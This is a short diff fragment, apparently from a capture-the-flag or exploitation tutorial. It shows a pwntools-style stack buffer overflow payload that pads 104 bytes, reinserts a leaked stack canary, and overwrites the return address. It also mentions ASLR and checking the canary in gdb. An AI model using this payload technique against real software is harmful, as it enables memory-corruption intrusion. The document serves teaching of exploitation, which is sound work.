Since ASLR is active, memory addresses are not consistent.

 print("[!] canary: %#x" % canary)

-We can check the value on gdb.
+We can verify the value in gdb:

 payload = cyclic(104) + p64(canary) + cyclic(8) + b"AAAAAAAA"